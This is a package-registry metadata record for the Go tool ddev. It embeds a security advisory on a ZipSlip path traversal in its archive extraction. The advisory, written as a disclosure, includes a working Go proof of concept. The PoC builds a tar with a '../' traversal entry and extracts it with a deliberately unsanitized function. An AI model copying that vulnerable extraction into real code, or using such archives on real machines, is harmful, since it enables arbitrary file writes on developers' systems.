{"id":7093111,"name":"github.com/ddev/ddev","ecosystem":"go","description":"","homepage":"https://github.com/ddev/ddev","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/ddev/ddev","keywords_array":[],"namespace":"github.com/ddev","versions_count":225,"first_release_published_at":"2017-08-23T17:31:36.000Z","latest_release_published_at":"2026-04-21T14:36:35.000Z","latest_release_number":"v1.25.2","last_synced_at":"2026-06-22T11:03:40.866Z","created_at":"2023-03-31T02:03:10.950Z","updated_at":"2026-06-22T17:13:47.422Z","registry_url":"https://pkg.go.dev/github.com/ddev/ddev","install_command":"go get github.com/ddev/ddev","documentation_url":"https://pkg.go.dev/github.com/ddev/ddev#section-documentation","metadata":{},"repo_metadata":{"id":37271332,"uuid":"80669528","full_name":"ddev/ddev","owner":"ddev","description":"Docker-based local PHP+Node.js web development environments","archived":false,"fork":false,"pushed_at":"2025-10-20T23:17:27.000Z","size":121276,"stargazers_count":3334,"open_issues_count":140,"forks_count":680,"subscribers_count":56,"default_branch":"main","last_synced_at":"2025-10-21T01:19:20.347Z","etag":null,"topics":["backdrop","craftcms","ddev","development","docker","drupal","laravel","linux","local-development","macos","magento","magento2","mariadb","moodle","nodejs","php","typo3","windows","wordpress"],"latest_commit_sha":null,"homepage":"https://ddev.com","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ddev.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":".github/CODEOWNERS","security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["ddev"],"custom":["https://www.paypal.com/donate/?hosted_button_id=MCNCSZHC7LHSQ","https://ddev.com/support-ddev/"]}},"created_at":"2017-02-01T22:09:39.000Z","updated_at":"2025-10-21T01:08:23.000Z","dependencies_parsed_at":"2023-10-23T17:34:47.868Z","dependency_job_id":"f319af1e-45e8-46fb-a813-d4216ea4449f","html_url":"https://github.com/ddev/ddev","commit_stats":{"total_commits":3468,"total_committers":346,"mean_commits":"10.023121387283236","dds":"0.39302191464821223","last_synced_commit":"fec8d695ffd89634060ed10d465ce6ba6f0f87ff"},"previous_names":["drud/ddev"],"tags_count":242,"template":false,"template_full_name":null,"purl":"pkg:github/ddev/ddev","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ddev%2Fddev","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ddev%2Fddev/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ddev%2Fddev/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ddev%2Fddev/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ddev","download_url":"https://codeload.github.com/ddev/ddev/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ddev%2Fddev/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":280563577,"owners_count":26351732,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-23T02:00:06.710Z","response_time":142,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"ddev","name":"DDEV","uuid":"595986","kind":"organization","description":"Fast, easy-to-use PHP/Node.js local development environments.","email":"support@ddev.com","website":"https://ddev.com","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/595986?v=4","repositories_count":98,"last_synced_at":"2025-10-03T00:29:16.923Z","metadata":{"has_sponsors_listing":true,"funding":{"github":["ddev"],"custom":["https://www.paypal.com/donate/?hosted_button_id=MCNCSZHC7LHSQ","https://ddev.com/support-ddev/"]}},"html_url":"https://github.com/ddev","funding_links":["https://github.com/sponsors/ddev","https://www.paypal.com/donate/?hosted_button_id=MCNCSZHC7LHSQ","https://ddev.com/support-ddev/"],"total_stars":4363,"followers":184,"following":0,"created_at":"2022-11-04T00:14:36.413Z","updated_at":"2025-10-03T00:29:16.923Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ddev","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ddev/repositories"},"tags":[]},"repo_metadata_updated_at":"2025-10-29T16:42:43.656Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.359114542655034,"dependent_packages_count":7.652494470934588,"stargazers_count":1.4185220621153238,"forks_count":1.2144913306406622,"average":4.911155601586402},"purl":"pkg:golang/github.com/ddev/ddev","advisories":[{"uuid":"GSA_kwCzR0hTQS14MnhxLXFoamYtNW12Z84ABVpe","url":"https://github.com/advisories/GHSA-x2xq-qhjf-5mvg","title":"DDEV has ZipSlip path traversal in tar and zip archive extraction","description":"## Summary\n\nThe DDEV local dev tool has unsanitized extraction in both `Untar()` and `Unzip()` functions in `pkg/archive/archive.go`. This flaw allows users to download and extract archives from remote sources without path validation.\n\n## Vulnerable Code\n\n`pkg/archive/archive.go:235` (Untar):\n```go\nfullPath := filepath.Join(dest, file.Name)  // NO SANITIZATION\n```\n\n`pkg/archive/archive.go:342` (Unzip):\n```go\nfullPath := filepath.Join(dest, file.Name)  // NO SANITIZATION\n```\n\nBoth functions create directories via `os.MkdirAll` and files via `os.Create` using the unsanitized path.\n\n## Impact\n\nLocal development tool that downloads and extracts archives from remote sources (add-ons, updates). Malicious archive → arbitrary file write on developer machine.\n\n## Proof of Concept\n\n```go\npackage main\n\n// PoC: ddev/ddev CWE-22 — ZipSlip in tar archive extraction\n// Replicates the exact pattern from pkg/archive/archive.go:235 (Untar)\n// and pkg/archive/archive.go:342 (Unzip) — both use filepath.Join(dest, name)\n// without verifying the result stays under the destination directory.\n\nimport (\n\t\"archive/tar\"\n\t\"bytes\"\n\t\"fmt\"\n\t\"io\"\n\t\"os\"\n\t\"path/filepath\"\n)\n\n// Vulnerable extraction — mirrors pkg/archive/archive.go:235\nfunc untarVulnerable(dst string, r io.Reader) error {\n\ttr := tar.NewReader(r)\n\tfor {\n\t\theader, err := tr.Next()\n\t\tif err == io.EOF {\n\t\t\tbreak\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\t// VULNERABLE: identical to archive.go:235\n\t\t// fullPath := filepath.Join(dest, file.Name)\n\t\tfullPath := filepath.Join(dst, header.Name)\n\n\t\tswitch header.Typeflag {\n\t\tcase tar.TypeDir:\n\t\t\tos.MkdirAll(fullPath, 0755)\n\t\tcase tar.TypeReg:\n\t\t\tos.MkdirAll(filepath.Dir(fullPath), 0755)\n\t\t\tf, _ := os.Create(fullPath)\n\t\t\tio.Copy(f, tr)\n\t\t\tf.Close()\n\t\t}\n\t}\n\treturn nil\n}\n\nfunc main() {\n\t// Build malicious tar with traversal entry\n\tvar buf bytes.Buffer\n\ttw := tar.NewWriter(\u0026buf)\n\tpayload := []byte(\"# PoC: ddev/ddev CWE-22 path traversal\\n\")\n\ttw.WriteHeader(\u0026tar.Header{\n\t\tName: \"../../../../../../tmp/ddev_cwe22_poc\",\n\t\tMode: 0644,\n\t\tSize: int64(len(payload)),\n\t})\n\ttw.Write(payload)\n\ttw.Close()\n\n\t// Extract into temp directory\n\textractDir, _ := os.MkdirTemp(\"\", \"ddev-poc-*\")\n\tdefer os.RemoveAll(extractDir)\n\n\tuntarVulnerable(extractDir, \u0026buf)\n\n\t// Verify escape\n\tescaped := \"/tmp/ddev_cwe22_poc\"\n\tif data, err := os.ReadFile(escaped); err == nil {\n\t\tfmt.Printf(\"[!!!] VULNERABLE — file written to: %s\\n\", escaped)\n\t\tfmt.Printf(\"[!!!] Content: %s\", string(data))\n\t\tos.Remove(escaped)\n\t} else {\n\t\tfmt.Println(\"[OK] Not vulnerable\")\n\t}\n}\n```\n\nOutput:\n```\n[!!!] VULNERABLE — file written to: /tmp/ddev_cwe22_poc\n[!!!] Content: # PoC: ddev/ddev CWE-22 path traversal\n```\n\n\u003e **Note:** Both `Untar` (archive.go:235) and `Unzip` (archive.go:342) use the same `filepath.Join(dest, file.Name)` pattern without containment checks. This PoC demonstrates the tar path; the zip path is analogously exploitable.\n\n## Suggested Fix\n\nAdd path containment check in both Untar and Unzip functions.\n\n## Credit\n\nKai Aizen (SnailSploit) — Adversarial AI \u0026 Security Research","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-04-22T19:06:36.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N","references":["https://github.com/ddev/ddev/security/advisories/GHSA-x2xq-qhjf-5mvg","https://nvd.nist.gov/vuln/detail/CVE-2026-32885","https://github.com/ddev/ddev/pull/8213","https://github.com/ddev/ddev/commit/05cbe299770a590b89bfc8dddab33e61b4302e43","https://github.com/ddev/ddev/releases/tag/v1.25.2","https://github.com/advisories/GHSA-x2xq-qhjf-5mvg"],"source_kind":"github","identifiers":["GHSA-x2xq-qhjf-5mvg","CVE-2026-32885"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-22T20:00:09.094Z","updated_at":"2026-06-22T16:01:26.713Z","epss_percentage":0.00418,"epss_percentile":0.3333,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14MnhxLXFoamYtNW12Z84ABVpe","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14MnhxLXFoamYtNW12Z84ABVpe","packages":[{"ecosystem":"go","package_name":"github.com/ddev/ddev","versions":[{"first_patched_version":"1.25.2","vulnerable_version_range":"\u003c 1.25.2"}],"purl":"pkg:go/github.com%2Fddev%2Fddev"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14MnhxLXFoamYtNW12Z84ABVpe/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/ddev/ddev","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/ddev/ddev","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/ddev/ddev/dependencies","status":null,"funding_links":["https://github.com/sponsors/ddev","https://www.paypal.com/donate/?hosted_button_id=MCNCSZHC7LHSQ","https://ddev.com/support-ddev/"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-23T05:02:37.203Z","issues_count":810,"pull_requests_count":1575,"avg_time_to_close_issue":8304151.29787234,"avg_time_to_close_pull_request":470555.9487369985,"issues_closed_count":564,"pull_requests_closed_count":1345,"pull_request_authors_count":174,"issue_authors_count":328,"avg_comments_per_issue":4.465432098765432,"avg_comments_per_pull_request":3.2165079365079365,"merged_pull_requests_count":1194,"bot_issues_count":16,"bot_pull_requests_count":42,"past_year_issues_count":343,"past_year_pull_requests_count":887,"past_year_avg_time_to_close_issue":896352.7136150235,"past_year_avg_time_to_close_pull_request":338550.12666666665,"past_year_issues_closed_count":213,"past_year_pull_requests_closed_count":749,"past_year_pull_request_authors_count":81,"past_year_issue_authors_count":162,"past_year_avg_comments_per_issue":2.7230320699708455,"past_year_avg_comments_per_pull_request":3.0496054114994364,"past_year_bot_issues_count":10,"past_year_bot_pull_requests_count":21,"past_year_merged_pull_requests_count":673,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/ddev%2Fddev/issues","maintainers":[{"login":"rfay","count":775,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rfay"},{"login":"stasadev","count":492,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stasadev"},{"login":"rpkoller","count":101,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rpkoller"},{"login":"tyler36","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tyler36"},{"login":"hanoii","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hanoii"},{"login":"GuySartorelli","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GuySartorelli"},{"login":"deviantintegral","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/deviantintegral"},{"login":"gilbertsoft","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gilbertsoft"},{"login":"mandrasch","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mandrasch"},{"login":"bserem","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bserem"},{"login":"bmartinez287","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bmartinez287"},{"login":"penyaskito","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/penyaskito"},{"login":"LionsAd","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/LionsAd"},{"login":"PierrePaul","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PierrePaul"},{"login":"jonaseberle","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jonaseberle"},{"login":"DigitalFrontiersMedia","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DigitalFrontiersMedia"},{"login":"mattstein","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattstein"},{"login":"Morgy93","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Morgy93"},{"login":"heddn","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/heddn"},{"login":"shaal","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shaal"},{"login":"cmuench","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cmuench"},{"login":"nico-loeber","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nico-loeber"},{"login":"gilzow","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gilzow"},{"login":"lolautruche","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lolautruche"},{"login":"dennisameling","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dennisameling"}],"active_maintainers":[{"login":"rfay","count":373,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rfay"},{"login":"stasadev","count":328,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stasadev"},{"login":"rpkoller","count":79,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rpkoller"},{"login":"hanoii","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hanoii"},{"login":"tyler36","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tyler36"},{"login":"bserem","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bserem"},{"login":"deviantintegral","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/deviantintegral"},{"login":"PierrePaul","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PierrePaul"},{"login":"DigitalFrontiersMedia","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DigitalFrontiersMedia"},{"login":"heddn","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/heddn"},{"login":"mandrasch","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mandrasch"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fddev%2Fddev/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fddev%2Fddev/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fddev%2Fddev/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fddev%2Fddev/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fddev%2Fddev/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fddev%2Fddev/codemeta","maintainers":[]}